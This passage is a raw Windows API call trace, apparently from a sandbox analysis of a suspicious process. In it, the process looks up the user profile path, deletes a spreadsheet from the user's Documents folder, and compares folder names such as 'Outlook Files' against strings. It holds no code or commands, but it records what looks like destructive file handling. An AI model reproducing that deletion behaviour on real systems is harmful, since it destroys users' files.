dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0265.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0265.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0265.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.806] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0265.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.807] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0265.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.807] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/OQOxXrKa.ods", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OQOxXrKa.ods", lpFilePart=0x8bedfc*="OQOxXrKa.ods") returned 0x34 [0265.807] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OQOxXrKa.ods", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9671e0f0, ftCreationTime.dwHighDateTime=0x1d4c553, ftLastAccessTime.dwLowDateTime=0x91baf540, ftLastAccessTime.dwHighDateTime=0x1d4cd7a, ftLastWriteTime.dwLowDateTime=0x91baf540, ftLastWriteTime.dwHighDateTime=0x1d4cd7a, nFileSizeHigh=0x0, nFileSizeLow=0x11ca6, dwReserved0=0x1e49, dwReserved1=0x4, cFileName="OQOxXrKa.ods", cAlternateFileName="")) returned 0xaa5860 [0265.808] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OQOxXrKa.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oqoxxrka.ods")) returned 1 [0265.810] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9671e0f0, ftCreationTime.dwHighDateTime=0x1d4c553, ftLastAccessTime.dwLowDateTime=0x91baf540, ftLastAccessTime.dwHighDateTime=0x1d4cd7a, ftLastWriteTime.dwLowDateTime=0x91baf540, ftLastWriteTime.dwHighDateTime=0x1d4cd7a, nFileSizeHigh=0x0, nFileSizeLow=0x11ca6, dwReserved0=0x1e49, dwReserved1=0x4, cFileName="OQOxXrKa.ods", cAlternateFileName="")) returned 0 [0265.811] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0265.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.811] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0265.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0265.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0265.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0265.812] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0265.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0265.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0265.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.812] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0265.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0265.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0265.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0265.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0265.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0265.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0265.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0265.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0265.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6a) returned 0x240c8d0 [0265.814] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/OQOxXrKa.ods", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OQOxXrKa.ods", lpFilePart=0x8bf658*="OQOxXrKa.ods") returned 0x34 [0265.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0265.815] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OQOxXrKa.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oqoxxrka.ods")) returned 0xffffffff [0265.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.815] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0265.816] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.816] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0265.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0265.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0265.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0265.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Outlook Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="utlook Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tlook Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="look Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ook Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ok Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0265.817] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0265.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0265.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0265.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6cb0 [0265.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0265.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Outlook Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="utlook Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tlook Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="look Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ook Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ok Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0265.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0265.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0265.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0265.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0265.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0265.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.820] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0265.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0265.820] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0265.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0265.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0265.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c48 [0265.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0265.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0265.822] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0265.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0265.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0265.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.822] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0265.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.822] RtlAllocateHeap 